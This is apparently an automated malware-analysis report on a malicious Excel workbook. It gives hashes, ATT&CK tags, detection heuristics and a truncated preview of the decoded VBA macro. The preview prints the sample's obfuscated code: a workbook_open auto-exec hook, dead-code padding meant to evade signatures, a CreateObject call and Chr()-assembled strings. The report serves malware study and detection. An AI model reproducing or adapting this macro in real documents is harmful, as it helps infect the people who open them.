Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cc6eeeb9c88c138a…

MALICIOUS

Office (OOXML)

27.1 KB Created: 2018-10-21 23:10:10 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2019-05-16
MD5: d14e152c8acb59eae492307f23cf6d0b SHA-1: eb6d1a76b6dfbb64e806aa4f02e410c372fab2da SHA-256: cc6eeeb9c88c138aee60dd325fef7bef1e91e5a97cdb26ea9a7e988c790c35fd
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The OOXML file contains a Workbook_Open VBA macro, which is a common technique for executing malicious code as soon as the document is opened. The macro uses a Shell() call and CreateObject, indicating that it likely attempts to download and execute a second-stage payload. The VBA code is heavily obfuscated — random-looking identifiers, `While`/`Wend` loops whose constant conditions are never true, and strings assembled from `Chr()` arithmetic — making it difficult to determine the exact payload or destination from the source alone.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or performance-cache stream contains an auto-execution token together with shell, download or object-execution tokens. This check covers p-code-only documents and those where source extraction failed, i.e. cases where no visible VBA source is available.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15332 bytes
SHA-256: 37ccbed5ceb2b3b7a03a5b32a72d3f76ad2275bbed55df3183725a99e1fb6c09
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
' Auto-exec entry point: Excel runs this handler when the workbook is opened
' (heuristic OLE_VBA_WBOPEN). The only statement in this Sub that has any
' effect is the call below into the obfuscated standard module
' T9zDCvx3nflJC47qcI; everything after it is padding.
T9zDCvx3nflJC47qcI.OL8_kkFgucdRfffzVkbR
' Each While/Wend below compares two different integer literals, so the loop
' body never executes, and every Dim declares a variable that is never read.
' This appears to be dead-code padding to dilute signature matching; detection
' should key on the auto-exec name plus the external call, not on the filler.
While 4 = 4658
Dim LPVt8NWjgL8nyryZNarlCWmzX9jSyFYsPLC8yLFVMe_hdzbxp_j5 As Variant
Wend
Dim zOxleU8nCuYvN As Integer
While 20 = 4907
Dim VlnzkATUWgW_UgeumsedzZ6MUS1GqIsjuNcyHy As Variant
Wend
Dim cijearZfIw As Integer

While 6 = 8466
Dim a3YA4QX6oZdPHKmMwwSEDokwO53S8MvxICoxsqobzfIrTKYW1L4mLCs As Variant
Wend
Dim uPlu8WD7ZmoF_ As Integer
While 23 = 8774
Dim fyd_FzOfe2bDeebuSHkES3fF6qDvirDn_S1Brxf As Variant
Wend
Dim UwKOXHqa2kJ As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "T9zDCvx3nflJC47qcI"
' Standard module that workbook_open calls into. The module-level String
' below is passed to CreateObject() further down in this listing; its
' assignment is not visible in this preview, so it presumably receives the
' target ProgID at runtime — NOTE(review): recover it by evaluating the Chr()
' arithmetic in a sandbox rather than by pattern-matching the source.
Dim SHgPPWqwFL5A2zBXXAjdUKKuX_aiEXQE7SyO8hfmO55E55_bFtF_U4WG6u2K6Gpr4xDg_vZyc7NYP_zb_8aTPLsB6pRKpTqFMKKE1fbTSPjXo7115XJ7o As String
 Function FdD_ulQVHYvc6vww8JnYBdlNRFmG7NNKIWki(e7Ysq2_mTSPubs8mmzscms_y12RZbq8ESWpUnN3rCqcIKXwD5zU4SjEv7j2xhmJlTIZDBk9W6_Z6Ozlb_MdlUCusP4XDVDIXfzxB7rBRz77SHIeF7Ys)
While 3 = 421
Dim NpKfqKXbHcvtF3HDTj6Z2oZ1KsdNWkB1pax7QASPb2sJGe27buQm As Variant
Wend
Dim Bw_iNTT7pH_fa4C As Integer
While 4 = 8889
Dim n_JuSPn896Oro1gukSXx2UNr7oViRwKsLbL1Q_8UWyEm9k As Variant
Wend
Dim n_HVbLCEIQzb As Integer

 Dim rtmgG7T3y7TA38iwKu1SdgvMf4jS_Pu__T1qda7F139xU99ObNCgW36J7Y_MU_2hKS6hE1Qtxtakh81f4S1uLMlKWps_Zsu1_YlBCZIj6RrlZTk9hcRAHFT8qsIXGLSD9jkGUxccIOx4d9tCDt
While 22 = 3346
Dim xm4DnJsedLnockTBZCOkrTAPZ5T8pFQ4AxJTaRI53bE As Variant
Wend
Dim aYb212_nEBNsbl As Integer
While 8 = 2379
Dim lmszuyW4tnoY_iG2TqOMh18BbEoaK2vDqqyoZDFlrfowLZ1ZfLpfcNCunpV As Variant
Wend
Dim oI6r12jrQtb As Integer


   Dim dkoJsPosTbNRXZf_TSBqjFVtw_zms__Jupox_SaG8WRCWLPvnP3xZAjVN4WnYA_OaCfqtr_A14sLxRUixC8bJKtsERi_5wq6VBkTphA6K16fQVh5gwyUCg_ORvjaH9_DLvyuqA3NBBORNLa
While 27 = 4637
Dim aOileAJIyBMM48JOjbnC_tpabvxw5lrioDuZ6zsAid1TZ5Atpk_Nmp As Variant
Wend
Dim bqiGIrLVMKSngzL As Integer
While 26 = 7629
Dim tSsslbe2UAfuDFRkb69kC1wp_xLOnAvVIf6QPe_L6xLFl7HO5 As Variant
Wend
Dim jzrhNH3eBsxONM As Integer
   
While 24 = 6042
Dim TMIjfIAT75unNmpCBo7TDIDw5WCvMuJ7qj22bVk_3N2vwj4Nx As Variant
Wend
Dim pHR4IIIUoG As Integer
While 12 = 3105
Dim FMEJtx7mtxjoC1ZxQP_Scw7NDAmvZrqEpb8nHqA8mOd9WAEacT22TTnRO1E As Variant
Wend
Dim rIILBEc8i2uoiO As Integer
 Set dkoJsPosTbNRXZf_TSBqjFVtw_zms__Jupox_SaG8WRCWLPvnP3xZAjVN4WnYA_OaCfqtr_A14sLxRUixC8bJKtsERi_5wq6VBkTphA6K16fQVh5gwyUCg_ORvjaH9_DLvyuqA3NBBORNLa = CreateObject(SHgPPWqwFL5A2zBXXAjdUKKuX_aiEXQE7SyO8hfmO55E55_bFtF_U4WG6u2K6Gpr4xDg_vZyc7NYP_zb_8aTPLsB6pRKpTqFMKKE1fbTSPjXo7115XJ7o)
While 19 = 2566
Dim BpLR81C5KR_zyuTxoXQjQwbCa33Beiqo As Variant
Wend
Dim QlRmZ9Q_Cw8 As Integer
While 27 = 8371
Dim zFJOrluKVV97MMHzD7_XljXhLbqVoEPgdxk6OlJYtVTQRnDYPGMCBWU As Variant
Wend
Dim OqlCN5WePEZb As Integer
   UZqDAkRcMHHOFKD3sjceF__kTV8yZPPHsZ2udAz4H1EFaHgtv7JwqZhTZ_snlcB729eoSRXrthVN42HKyMCb_baR2fSXPK = Chr(434 - 336) & Chr(374 - 269) & Chr(440 - 330) & Chr(303 - 257) & Chr(202 - 104) & Chr(492 - 395) & Chr(485 - 370) &
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 44032 bytes
SHA-256: 5930fdb481736eeeda47e5d5fcfd22d6d034504be525ce2e8fe586533de98233
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).